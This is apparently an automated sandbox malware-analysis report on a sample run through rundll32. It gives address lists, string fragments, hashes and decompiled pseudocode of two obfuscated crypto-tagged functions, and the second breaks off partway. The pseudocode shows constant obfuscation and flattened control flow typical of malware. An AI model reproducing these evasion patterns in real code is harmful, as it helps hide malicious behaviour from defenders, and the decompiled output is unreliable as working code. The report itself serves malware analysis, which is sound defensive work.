0x002a4441
0x002a444c
0x002a4457
0x002a445f
0x002a4467
0x002a4472
0x002a447a
0x002a4487
0x002a448b
0x002a448f
0x002a449e
0x002a44a5
0x002a44a9
0x002a44b0
0x002a44b0
0x002a44b4
0x002a44b4
0x002a44b4
0x002a44ba
0x00000000
0x00000000
0x002a46f0
0x002a46f6
0x002a4a31
0x002a4a36
0x002a4a39
0x002a4a3e
0x002a4a42
0x002a4a43
0x002a4a4a
0x00000000
0x002a46fc
0x002a46fc
0x002a4702
0x002a4970
0x002a4979
0x002a49d9
0x002a49f5
0x002a49fe
0x002a4a01
0x00000000
0x002a4708
0x002a4708
0x002a470e
0x002a48f6
0x002a4906
0x002a4917
0x002a494c
0x002a4953
0x002a4958
0x002a495d
0x002a4965
0x00000000
0x002a4714
0x002a4714
0x002a471a
0x002a4886
0x002a489e
0x002a48a5
0x002a48a7
0x002a48aa
0x002a48b1
0x002a48b3
0x002a48d4
0x002a48d9
0x002a48dc
0x002a48e0
0x002a48e2
0x002a4a5e
0x002a4a65
0x002a4a69
0x002a4a6b
0x002a48e8
0x002a48e8
0x002a48ed
0x002a48ed
0x00000000
0x002a48ed
0x002a48e2
0x002a4720
0x002a4720
0x002a4726
0x002a4847
0x002a484e
0x002a4856
0x002a485b
0x002a4860
0x002a4868
0x00000000
0x002a472c
0x002a472c
0x002a4732
0x002a4822
0x002a4828
0x002a4562
0x002a44b0
0x002a44b0
0x00000000
0x002a44b0
0x002a4738
0x002a4738
0x002a473e
0x002a4a51
0x002a4a51
0x002a4a57
0x002a44b0
0x002a44b0
0x00000000
0x002a44b0
0x002a44b0
0x002a4744
0x002a4744
0x002a4750
0x002a475b
0x002a4765
0x002a4783
0x002a4794
0x002a47a8
0x002a47ca
0x002a47e6
0x002a47eb
0x002a47f0
0x002a47f3
0x002a47fb
0x002a47ff
0x002a4803
0x002a4807
0x002a4807
0x00000000
0x002a4807
0x002a473e
0x002a4732
0x002a4726
0x002a471a
0x002a470e
0x002a4702
0x002a4a74
0x002a4a7d
0x002a4a7d
0x002a44c0
0x002a46e0
0x002a46e6
0x00000000
0x002a44c6
0x002a44cb
0x002a44cd
0x002a45ce
0x002a45d4
0x002a46ba
0x002a46c1
0x00000000
0x002a45da
0x002a45da
0x002a45e0
0x002a4697
0x002a469d
0x00000000
0x002a45e6
0x002a45e6
0x002a45ec
0x00000000
0x002a45f2
0x002a45f9
0x002a4604
0x002a4609
0x002a4609
0x002a460a
0x002a460e
0x002a460f
0x002a4636
0x002a463c
0x002a4641
0x002a4644
0x002a4649
0x002a464a
0x002a464d
0x002a4650
0x002a4650
0x002a4650
0x002a4653
0x002a465a
0x002a465a
0x002a4661
0x002a466a
0x002a466d
0x002a4672
0x002a4676
0x00000000
0x002a4676
0x002a45ec
0x002a45e0
0x002a44d3
0x002a44d3
0x002a45b6
0x002a45bd
0x002a45be
0x002a45c6
0x00000000
0x002a44d9
0x002a44df
0x002a4594
0x002a4599
0x00000000
0x002a44e5
0x002a44eb
0x002a4580
0x002a4586
0x00000000
0x002a44ed
0x002a44f3
0x002a451a
0x002a4526
0x002a4534
0x002a453b
0x002a454a
0x002a454f
0x002a4554
0x002a455c
0x002a455c
0x00000000
0x002a44f5
0x002a44fb
0x00000000
0x002a4501
0x002a4501
0x002a4505
0x00000000
0x002a4505
0x002a44fb
0x002a44f3
0x002a44eb
0x002a44df
0x002a44d3
0x002a44cd
0x00000000
0x002a44c0

Strings

1H, xrefs: 002A3FB6
s*., xrefs: 002A43B7
2UD, xrefs: 002A43A4
sp, xrefs: 002A3DA8
^!}:, xrefs: 002A4738
H1, xrefs: 002A3BD2
Td, xrefs: 002A3A92
*7G, xrefs: 002A3E66
qZ=, xrefs: 002A3B0F
ym, xrefs: 002A3A29
b-, xrefs: 002A3B5E
Al, xrefs: 002A42EE
h=, xrefs: 002A3D9D
s, xrefs: 002A3D50
ba, xrefs: 002A42C2
W7, xrefs: 002A3F76
(, xrefs: 002A40C7
6|, xrefs: 002A3A51
a`, xrefs: 002A437B
IT, xrefs: 002A4009
N*, xrefs: 002A43D7
26, xrefs: 002A3F0E
0'+, xrefs: 002A3FD4
*7G, xrefs: 002A484E
|3, xrefs: 002A4019

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ($*7G$*7G$1H$26$2UD$6|$Al$H1$IT$N*$Td$W7$^!}:$a`$b-$ba$h=$qZ=$s*.$sp$s$ym$|3$0'+
API String ID: 0-2786088476
Opcode ID: 7e8f934f9565e4448ff738bf2ab5490ff13719b20c2bbdc2d3d75165c0bf079f
Instruction ID: 0b301f44c091028e92b489c973f6435de36e7c7a4a85c66cb00c599ed59f72a0
Opcode Fuzzy Hash: 7e8f934f9565e4448ff738bf2ab5490ff13719b20c2bbdc2d3d75165c0bf079f
Instruction Fuzzy Hash: 04822271508381CFE378CF25C949A9BBBE1BBC5304F508A1DE1CA862A0CBB59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002A2A7D, Relevance: 27.9, Strings: 22, Instructions: 437
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E002A2A7D(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				intOrPtr _v544;
				char _v548;
				intOrPtr _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				unsigned int _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _t466;
				void* _t468;
				intOrPtr _t470;
				intOrPtr _t475;
				void* _t479;
				intOrPtr _t482;
				intOrPtr _t485;
				intOrPtr _t494;
				signed int _t497;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				signed int _t504;
				void* _t505;
				intOrPtr _t546;
				signed int _t547;
				intOrPtr _t551;
				void* _t552;
				void* _t553;
				void* _t557;

				_v552 = __edx;
				_t551 = __ecx;
				_v556 = _v556 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_v532 = 0x6766ac;
				_v728 = 0x2d62;
				_v728 = _v728 | 0x6ce9e83c;
				_v728 = _v728 ^ 0x7f524897;
				_v728 = _v728 ^ 0x11bba5e9;
				_v672 = 0x29;
				_v672 = _v672 << 6;
				_v672 = _v672 | 0x9f4dd241;
				_v672 = _v672 ^ 0x9f4dedb7;
				_v648 = 0xdcd3;
				_v648 = _v648 ^ 0x4b8f2daf;
				_v648 = _v648 | 0x8b74ccaa;
				_v648 = _v648 ^ 0xcbffbdf2;
				_v680 = 0xd9a0;
				_v680 = _v680 + 0xffff83d2;
				_v680 = _v680 << 1;
				_v680 = _v680 ^ 0x0000ae8c;
				_v668 = 0xa13e;
				_v668 = _v668 ^ 0x33b1fc45;
				_v668 = _v668 + 0xffff8ac2;
				_v668 = _v668 ^ 0x33b0b4d9;
				_v608 = 0x4403;
				_v608 = _v608 * 0x7d;
				_v608 = _v608 ^ 0x00213dd9;
				_t547 = 0x8e1af5;
				_v704 = 0x7b03;
				_v704 = _v704 << 0xe;
				_t497 = 0x59;
				_v704 = _v704 / _t497;
				_v704 = _v704 + 0x1244;
				_v704 = _v704 ^ 0x00588ffd;
				_v736 = 0x78e6;
				_v736 = _v736 ^ 0x3729ec33;
				_v736 = _v736 ^ 0x368de781;
				_v736 = _v736 | 0xa3aa86c9;
				_v736 = _v736 ^ 0xa3ae8441;
				_v664 = 0xa0c1;
				_v664 = _v664 ^ 0xeb385610;
				_t498 = 0x2c;
				_v664 = _v664 * 0x55;
				_v664 = _v664 ^ 0x19e9e19c;
				_v632 = 0xa0f0;
				_v632 = _v632 + 0x6a99;
				_v632 = _v632 | 0x8e6e44ff;
				_v632 = _v632 ^ 0x8e6f4d90;
				_v696 = 0x6dea;
				_v696 = _v696 | 0xc35eca27;
				_v696 = _v696 ^ 0x3ea55097;
				_v696 = _v696 | 0x31277f50;
				_v696 = _v696 ^ 0xfdffccad;
				_v712 = 0xf584;
				_v712 = _v712 >> 7;
				_v712 = _v712 << 3;
				_v712 = _v712 | 0x8174ddf2;
				_v712 = _v712 ^ 0x8174fc6c;
				_v732 = 0x4454;
				_v732 = _v732 / _t498;
				_v732 = _v732 << 0xc;
				_v732 = _v732 ^ 0x0018a645;
				_v740 = 0xc5e1;
				_v740 = _v740 + 0xffff4490;
				_v740 = _v740 | 0x43b92451;
				_v740 = _v740 + 0xdc57;
				_v740 = _v740 ^ 0x43ba6118;
				_v660 = 0xac0a;
				_t499 = 0xd;
				_v660 = _v660 * 0x58;
				_v660 = _v660 ^ 0x8e182767;
				_v660 = _v660 ^ 0x8e2325fc;
				_v572 = 0xc7f5;
				_v572 = _v572 | 0xd9e3d29a;
				_v572 = _v572 ^ 0xd9e3b8c0;
				_v576 = 0xcad2;
				_v576 = _v576 * 0x2e;
				_v576 = _v576 ^ 0x00244e3c;
				_v724 = 0x585e;
				_v724 = _v724 >> 8;
				_v724 = _v724 / _t499;
				_v724 = _v724 | 0x48570f4d;
				_v724 = _v724 ^ 0x48572c54;
				_v568 = 0x430c;
				_t500 = 0x15;
				_v568 = _v568 * 0x3b;
				_v568 = _v568 ^ 0x000f293f;
				_v584 = 0xc2dd;
				_v584 = _v584 * 0x16;
				_v584 = _v584 ^ 0x0010a62c;
				_v604 = 0x78f7;
				_v604 = _v604 ^ 0x857f7f2e;
				_v604 = _v604 ^ 0x857f2656;
				_v644 = 0x6796;
				_v644 = _v644 ^ 0xc7373988;
				_v644 = _v644 | 0x85469171;
				_v644 = _v644 ^ 0xc777e4e5;
				_v612 = 0x2fdb;
				_v612 = _v612 ^ 0x0a8ba0bd;
				_v612 = _v612 ^ 0x0a8bbe40;
				_v652 = 0xb46b;
				_v652 = _v652 / _t500;
				_v652 = _v652 << 5;
				_v652 = _v652 ^ 0x000140f0;
				_v628 = 0xf195;
				_t501 = 0x6e;
				_v628 = _v628 * 0x56;
				_v628 = _v628 << 0xa;
				_v628 = _v628 ^ 0x44a0534f;
				_v636 = 0xe32d;
				_v636 = _v636 + 0xbea;
				_v636 = _v636 << 0xe;
				_v636 = _v636 ^ 0x3bc59200;
				_v708 = 0x294c;
				_v708 = _v708 / _t501;
				_v708 = _v708 << 5;
				_v708 = _v708 + 0xa940;
				_v708 = _v708 ^ 0x000091f0;
				_v716 = 0x1cd8;
				_v716 = _v716 >> 2;
				_v716 = _v716 + 0xffff9aec;
				_v716 = _v716 * 0x55;
				_v716 = _v716 ^ 0xffe0cfb4;
				_v620 = 0xbaec;
				_v620 = _v620 >> 0xd;
				_t502 = 0x52;
				_v620 = _v620 * 0x65;
				_v620 = _v620 ^ 0x00004376;
				_v588 = 0xe39b;
				_v588 = _v588 * 0x57;
				_v588 = _v588 ^ 0x004d02e8;
				_v700 = 0xaf51;
				_v700 = _v700 << 0xe;
				_v700 = _v700 / _t502;
				_v700 = _v700 ^ 0x4f7dcd1e;
				_v700 = _v700 ^ 0x4ff52a73;
				_v596 = 0x5587;
				_v596 = _v596 + 0x4d2f;
				_v596 = _v596 ^ 0x0000d774;
				_v656 = 0xcc72;
				_t503 = 0x67;
				_v656 = _v656 * 0xf;
				_v656 = _v656 / _t503;
				_v656 = _v656 ^ 0x000077da;
				_v744 = 0x2fc2;
				_v744 = _v744 << 5;
				_v744 = _v744 + 0xffff4d22;
				_v744 = _v744 ^ 0xdd17369c;
				_v744 = _v744 ^ 0xdd122810;
				_v616 = 0xa378;
				_v616 = _v616 + 0xffff7c5d;
				_v616 = _v616 ^ 0x00005d86;
				_v640 = 0x5a5;
				_v640 = _v640 >> 0x10;
				_v640 = _v640 | 0xfef239f0;
				_v640 = _v640 ^ 0xfef23b58;
				_v720 = 0x52ce;
				_v720 = _v720 + 0xffff33a3;
				_v720 = _v720 >> 1;
				_v720 = _v720 >> 0xa;
				_v720 = _v720 ^ 0x001fb42b;
				_v688 = 0x5c23;
				_t504 = 0x50;
				_v688 = _v688 * 0x55;
				_v688 = _v688 + 0x1231;
				_v688 = _v688 ^ 0x001e88ef;
				_v676 = 0x9e6d;
				_v676 = _v676 / _t504;
				_v676 = _v676 + 0xb782;
				_v676 = _v676 ^ 0x0000a4c8;
				_v684 = 0x759a;
				_v684 = _v684 << 5;
				_v684 = _v684 + 0xffff382e;
				_v684 = _v684 ^ 0x000d84b1;
				_v624 = 0x202a;
				_v624 = _v624 + 0x5730;
				_v624 = _v624 * 0x56;
				_v624 = _v624 ^ 0x00282a5a;
				_v592 = 0x2a95;
				_v592 = _v592 * 0xe;
				_v592 = _v592 ^ 0x00021224;
				_v564 = 0x9352;
				_v564 = _v564 * 0x65;
				_v564 = _v564 ^ 0x003a3f60;
				_v600 = 0x7e1f;
				_v600 = _v600 >> 7;
				_v600 = _v600 ^ 0x00005dc5;
				_t494 = _v552;
				_t546 = _v552;
				_v560 = 0xc681;
				_v560 = _v560 | 0xa5893f41;
				_v560 = _v560 ^ 0xa5898a3e;
				_v580 = 0x9fa3;
				_v580 = _v580 + 0xe136;
				_v580 = _v580 ^ 0x0001caac;
				_v692 = 0xd278;
				_v692 = _v692 | 0xa89f6e9b;
				_v692 = _v692 >> 4;
				_v692 = _v692 << 9;
				_v692 = _v692 ^ 0x13ffb75e;
				while(1) {
					L1:
					while(1) {
						L2:
						_t505 = 0x1c1fcda8;
						do {
							while(1) {
								L3:
								_t557 = _t547 - 0xcc0a13f;
								if(_t557 <= 0) {
									break;
								}
								__eflags = _t547 - _t505;
								if(_t547 == _t505) {
									_push(_t505);
									_push(_v584);
									_t466 = E0029E924( &_v548, _v576,  &_v524, _v724, _v568, _t505, _v556);
									_t553 = _t552 + 0x1c;
									__eflags = _t466;
									if(_t466 != 0) {
										E002A0DE5(_v604, _v612, _v548, _v652);
										E002A0DE5(_v628, _v708, _v544, _v716);
										_t553 = _t553 + 0x18;
									}
									E002A0DE5(_v620, _v700, _v556, _v596);
									_t552 = _t553 + 0xc;
									_t547 = 0x5e062c2;
									_t468 = 0x20687a51;
									_t505 = 0x1c1fcda8;
									goto L30;
								} else {
									__eflags = _t547 - 0x21ab1faf;
									if(_t547 == 0x21ab1faf) {
										_t470 = E00292746(_t551, _v552, 0x2af1d0,  &_v524);
										__eflags = _t470;
										_t468 = 0x20687a51;
										if(_t470 == 0) {
											__eflags = _t494 - 0x20687a51;
											if(_t494 == 0x20687a51) {
												_t402 =  &_v572; // 0x244e3c
												E002A0DE5(_v732, _v660, _v556,  *_t402);
												_t552 = _t552 + 0xc;
												_t468 = 0x20687a51;
											}
											_t547 = 0x52c4c33;
											L2:
											_t505 = 0x1c1fcda8;
										} else {
											__eflags = _t494 - 0x20687a51;
											_t505 = 0x1c1fcda8;
											_t547 =  ==  ? 0x1c1fcda8 : 0x34cd546b;
										}
										continue;
									} else {
										__eflags = _t547 - 0x34cd546b;
										if(__eflags != 0) {
											goto L30;
										} else {
											_t383 =  &_v720; // 0x48572c54
											_push( *_t383);
											_push(_v640);
											_push( &_v548);
											_push(_v616);
											_push(0);
											_push(_v744);
											_push( &_v524);
											_push(0);
											_t485 = E002A4DAD(_v656, __eflags);
											_t552 = _t552 + 0x20;
											__eflags = _t485;
											if(_t485 != 0) {
												E002A0DE5(_v688, _v684, _v548, _v624);
												E002A0DE5(_v592, _v600, _v544, _v560);
												_t552 = _t552 + 0x18;
											}
											_t547 = 0x5e062c2;
											while(1) {
												L1:
												while(1) {
													L2:
													_t505 = 0x1c1fcda8;
													goto L3;
												}
											}
										}
									}
								}
								L33:
								return _t475;
							}
							if(_t557 == 0) {
								__eflags = _t494 - _t468;
								if(_t494 != _t468) {
									_t547 = 0x21ab1faf;
									goto L3;
								} else {
									_push(_v712);
									E002AA2EA(_v664,  &_v556, _t505, _v632, _v696, _v728);
									_t552 = _t552 + 0x18;
									asm("sbb esi, esi");
									_t547 = (_t547 & 0x1c7ed37c) + 0x52c4c33;
									while(1) {
										L1:
										goto L2;
									}
								}
								goto L33;
							}
							if(_t547 != 0x8e1af5) {
								if(_t547 == 0x3101514) {
									_t479 = E002A8313();
									__eflags = _t479 - E00296DE7();
									_t468 = 0x20687a51;
									_t547 = 0xcc0a13f;
									_t494 =  !=  ? 0x20687a51 : 0xdc01450;
									goto L2;
								} else {
									if(_t547 == 0x52c4c33) {
										return E0029EF80(_v580, _t546, _v692);
									}
									if(_t547 == 0x5e062c2) {
										 *((intOrPtr*)(_t546 + 0x1c)) = _t551;
										_t482 =  *0x2b0718; // 0x0
										 *((intOrPtr*)(_t546 + 8)) = _t482;
										 *0x2b0718 = _t546;
										return _t482;
									}
									goto L30;
								}
								goto L33;
							}
							_push(_t505);
							_push(_t505);
							_t475 = E002A9E2B(0x38);
							_t546 = _t475;
							_t552 = _t552 + 0xc;
							__eflags = _t546;
							if(_t546 != 0) {
								_t547 = 0x3101514;
								goto L1;
							}
							goto L33;
							L30:
							__eflags = _t547 - 0x1e92555;
						} while (_t547 != 0x1e92555);
						return _t468;
					}
				}
			}

0x002a2a87
0x002a2a8e
0x002a2a90
0x002a2a98
0x002a2aa0
0x002a2aab
0x002a2abb
0x002a2ac3
0x002a2acb
0x002a2ad3
0x002a2adb
0x002a2ae0
0x002a2ae8
0x002a2af0
0x002a2af8
0x002a2b00
0x002a2b08
0x002a2b10
0x002a2b18
0x002a2b20
0x002a2b24
0x002a2b2c
0x002a2b34
0x002a2b3c
0x002a2b44
0x002a2b4c
0x002a2b5f
0x002a2b66
0x002a2b71
0x002a2b76
0x002a2b7e
0x002a2b8b
0x002a2b90
0x002a2b96
0x002a2b9e
0x002a2ba6
0x002a2bae
0x002a2bb6
0x002a2bbe
0x002a2bc6
0x002a2bce
0x002a2bd6
0x002a2be3
0x002a2be4
0x002a2be8
0x002a2bf0
0x002a2bfb
0x002a2c06
0x002a2c11
0x002a2c1c
0x002a2c24
0x002a2c2c
0x002a2c34
0x002a2c3c
0x002a2c44
0x002a2c4c
0x002a2c51
0x002a2c56
0x002a2c5e
0x002a2c66
0x002a2c74
0x002a2c80
0x002a2c85
0x002a2c8d
0x002a2c97
0x002a2c9f
0x002a2ca7
0x002a2caf
0x002a2cb7
0x002a2cc6
0x002a2cc9
0x002a2ccd
0x002a2cd5
0x002a2cdd
0x002a2ce8
0x002a2cf3
0x002a2cfe
0x002a2d11
0x002a2d18
0x002a2d23
0x002a2d2b
0x002a2d38
0x002a2d3c
0x002a2d44
0x002a2d4c
0x002a2d5f
0x002a2d62
0x002a2d69
0x002a2d74
0x002a2d87
0x002a2d8e
0x002a2d99
0x002a2da4
0x002a2daf
0x002a2dba
0x002a2dc2
0x002a2dca
0x002a2dd2
0x002a2dda
0x002a2de5
0x002a2df0
0x002a2dfb
0x002a2e0b
0x002a2e0f
0x002a2e14
0x002a2e1c
0x002a2e2f
0x002a2e30
0x002a2e37
0x002a2e3f
0x002a2e4a
0x002a2e55
0x002a2e60
0x002a2e68
0x002a2e73
0x002a2e81
0x002a2e85
0x002a2e8a
0x002a2e92
0x002a2e9a
0x002a2ea2
0x002a2ea7
0x002a2eb4
0x002a2eb8
0x002a2ec0
0x002a2ecb
0x002a2edf
0x002a2ee2
0x002a2ee9
0x002a2ef4
0x002a2f07
0x002a2f0e
0x002a2f19
0x002a2f21
0x002a2f2e
0x002a2f32
0x002a2f3a
0x002a2f42
0x002a2f4d
0x002a2f58
0x002a2f63
0x002a2f70
0x002a2f73
0x002a2f7f
0x002a2f83
0x002a2f8b
0x002a2f93
0x002a2f98
0x002a2fa0
0x002a2fa8
0x002a2fb0
0x002a2fbb
0x002a2fc6
0x002a2fd1
0x002a2fdc
0x002a2fe4
0x002a2fef
0x002a2ffa
0x002a3002
0x002a300a
0x002a300e
0x002a3013
0x002a301b
0x002a3028
0x002a3029
0x002a302d
0x002a3035
0x002a303d
0x002a304b
0x002a304f
0x002a3057
0x002a305f
0x002a3067
0x002a306c
0x002a3074
0x002a307c
0x002a3087
0x002a309a
0x002a30a1
0x002a30ac
0x002a30bf
0x002a30c6
0x002a30d1
0x002a30e4
0x002a30eb
0x002a30f6
0x002a3101
0x002a3109
0x002a3114
0x002a311b
0x002a3122
0x002a312d
0x002a3138
0x002a3143
0x002a314e
0x002a3159
0x002a3164
0x002a316c
0x002a3174
0x002a3179
0x002a317e
0x002a3186
0x002a3186
0x002a318b
0x002a318b
0x002a318b
0x002a3190
0x002a3190
0x002a3190
0x002a3190
0x002a3196
0x00000000
0x00000000
0x002a328f
0x002a3291
0x002a33b2
0x002a33b3
0x002a33e3
0x002a33e8
0x002a33eb
0x002a33ed
0x002a340f
0x002a3434
0x002a3439
0x002a3439
0x002a345c
0x002a3461
0x002a3464
0x002a3469
0x002a346e
0x00000000
0x002a3297
0x002a3297
0x002a329d
0x002a3359
0x002a335f
0x002a3361
0x002a3367
0x002a337d
0x002a337f
0x002a3381
0x002a339b
0x002a33a0
0x002a33a3
0x002a33a3
0x002a33a8
0x002a318b
0x002a318b
0x002a3369
0x002a3369
0x002a3370
0x002a3375
0x002a3375
0x00000000
0x002a32a3
0x002a32a3
0x002a32a9
0x00000000
0x002a32af
0x002a32af
0x002a32af
0x002a32ba
0x002a32c1
0x002a32c2
0x002a32d0
0x002a32d2
0x002a32dd
0x002a32de
0x002a32e0
0x002a32e5
0x002a32e8
0x002a32ea
0x002a3306
0x002a3331
0x002a3336
0x002a3336
0x002a3339
0x002a3186
0x002a3186
0x002a318b
0x002a318b
0x002a318b
0x00000000
0x002a318b
0x002a318b
0x002a3186
0x002a32a9
0x002a329d
0x002a349e
0x002a349e
0x002a349e
0x002a319c
0x002a3244
0x002a3246
0x002a3285
0x00000000
0x002a3248
0x002a3248
0x002a3268
0x002a326d
0x002a3272
0x002a327a
0x002a3186
0x002a3186
0x00000000
0x002a3186
0x002a3186
0x00000000
0x002a3246
0x002a31a8
0x002a31b0
0x002a31ef
0x002a31fb
0x002a3202
0x002a3207
0x002a320c
0x00000000
0x002a31b2
0x002a31b8
0x00000000
0x002a3493
0x002a31c4
0x002a31ca
0x002a31cd
0x002a31d2
0x002a31d5
0x00000000
0x002a31d5
0x00000000
0x002a31c4
0x00000000
0x002a31b0
0x002a3224
0x002a3225
0x002a3228
0x002a322d
0x002a322f
0x002a3232
0x002a3234
0x002a323a
0x00000000
0x002a323a
0x00000000
0x002a3473
0x002a3473
0x002a3473
0x00000000
0x002a3190
0x002a318b

Strings

TD, xrefs: 002A2C66
6, xrefs: 002A314E
<N$, xrefs: 002A3381
<l, xrefs: 002A2ABB
T,WH, xrefs: 002A32AF
Qzh , xrefs: 002A3469
`?:, xrefs: 002A30EB
/M, xrefs: 002A2F4D
), xrefs: 002A2AD3
Qzh , xrefs: 002A3202
3)7, xrefs: 002A2BAE
-, xrefs: 002A2E4A
T,WH, xrefs: 002A2D30
L), xrefs: 002A2E73
Qzh , xrefs: 002A3361
m, xrefs: 002A2C1C
<N$, xrefs: 002A2D09
Qzh , xrefs: 002A3186
vC, xrefs: 002A2EE9
Qzh , xrefs: 002A33A3
#\, xrefs: 002A301B
Z*(, xrefs: 002A30A1

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #\$)$-$/M$3)7$6$<N$$<N$$<l$L)$Qzh $Qzh $Qzh $Qzh $Qzh $T,WH$T,WH$TD$Z*($`?:$vC$m
API String ID: 0-1602369163
Opcode ID: 106bff1dfb4fdf3db0353b156cb0e966e9b70e8f877c389fd44f21a364096e12
Instruction ID: 20a01b89a8e26fc0d09b0c9609f3b1b0cd8b7d5f0b142f8a0c6c88f1a45494e0
Opcode Fuzzy Hash: 106bff1dfb4fdf3db0353b156cb0e966e9b70e8f877c389fd44f21a364096e12
Instruction Fuzzy Hash: AF321171518381CBE378CF64C58AA8BFBE1BBC5304F108A1DE5D9962A0DBB49958CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00291600, Relevance: 26.8, Strings: 21, Instructions: 524
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00291600(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				unsigned int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				unsigned int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _t565;
				signed int _t566;
				signed int _t571;
				signed int _t576;
				signed int _t586;
				signed int _t587;
				signed int _t590;
				signed int _t594;
				signed int _t599;
				signed int _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t608;
				signed int _t609;
				void* _t622;
				signed int _t663;
				signed int _t664;
				void* _t665;
				signed int _t671;
				signed int _t675;
				signed int* _t676;
				signed int* _t677;
				void* _t679;

				_t676 =  &_v1820;
				_v1752 = 0xe7dc;
				_v1752 = _v1752 | 0xbbb084f7;
				_v1752 = _v1752 >> 3;
				_v1752 = _v1752 ^ 0x17761cd6;
				_v1784 = 0xa401;
				_v1592 = __edx;
				_t665 = 0x1fe88934;
				_v1588 = __ecx;
				_t599 = 0x52;
				_v1784 = _v1784 / _t599;
				_t663 = 0x7e;
				_v1784 = _v1784 * 0x35;
				_v1784 = _v1784 << 0x10;
				_v1784 = _v1784 ^ 0x6a006efb;
				_v1816 = 0xa6d9;
				_v1816 = _v1816 >> 0xd;
				_v1816 = _v1816 >> 7;
				_v1816 = _v1816 << 0xf;
				_v1816 = _v1816 ^ 0x000035d9;
				_v1648 = 0x817b;
				_v1648 = _v1648 + 0x19d6;
				_v1648 = _v1648 ^ 0x0000fac3;
				_v1728 = 0x8791;
				_v1728 = _v1728 / _t663;
				_v1728 = _v1728 | 0x1309302b;
				_v1728 = _v1728 ^ 0x1309792c;
				_v1772 = 0x36a;
				_v1772 = _v1772 | 0xa00da548;
				_v1772 = _v1772 << 2;
				_v1772 = _v1772 >> 0xe;
				_v1772 = _v1772 ^ 0x000246f9;
				_v1656 = 0xe02f;
				_v1656 = _v1656 ^ 0xffef37a8;
				_v1656 = _v1656 ^ 0xffef8eaa;
				_v1624 = 0xca82;
				_v1624 = _v1624 * 0x74;
				_v1624 = _v1624 ^ 0x005b891a;
				_v1704 = 0xcd20;
				_v1704 = _v1704 + 0x5ce3;
				_v1704 = _v1704 ^ 0xb9506522;
				_v1704 = _v1704 ^ 0xb9513418;
				_v1712 = 0x786f;
				_v1712 = _v1712 >> 4;
				_v1712 = _v1712 << 3;
				_v1712 = _v1712 ^ 0x00002dd4;
				_v1632 = 0x3393;
				_v1632 = _v1632 ^ 0xb3f8477c;
				_v1632 = _v1632 ^ 0xb3f808a6;
				_v1640 = 0x4661;
				_v1640 = _v1640 | 0xdca56c92;
				_v1640 = _v1640 ^ 0xdca57894;
				_v1760 = 0xb4c5;
				_v1760 = _v1760 + 0xfba0;
				_v1760 = _v1760 + 0xfffff0ce;
				_v1760 = _v1760 + 0x1afe;
				_v1760 = _v1760 ^ 0x0001fbda;
				_v1792 = 0xa1e6;
				_v1792 = _v1792 * 0x31;
				_v1792 = _v1792 >> 0xb;
				_v1792 = _v1792 ^ 0x90b63b30;
				_v1792 = _v1792 ^ 0x90b62b06;
				_v1604 = 0x7889;
				_v1604 = _v1604 * 0xb;
				_v1604 = _v1604 ^ 0x00054f7c;
				_v1628 = 0x3fdb;
				_t600 = 0x4b;
				_v1628 = _v1628 * 0x1d;
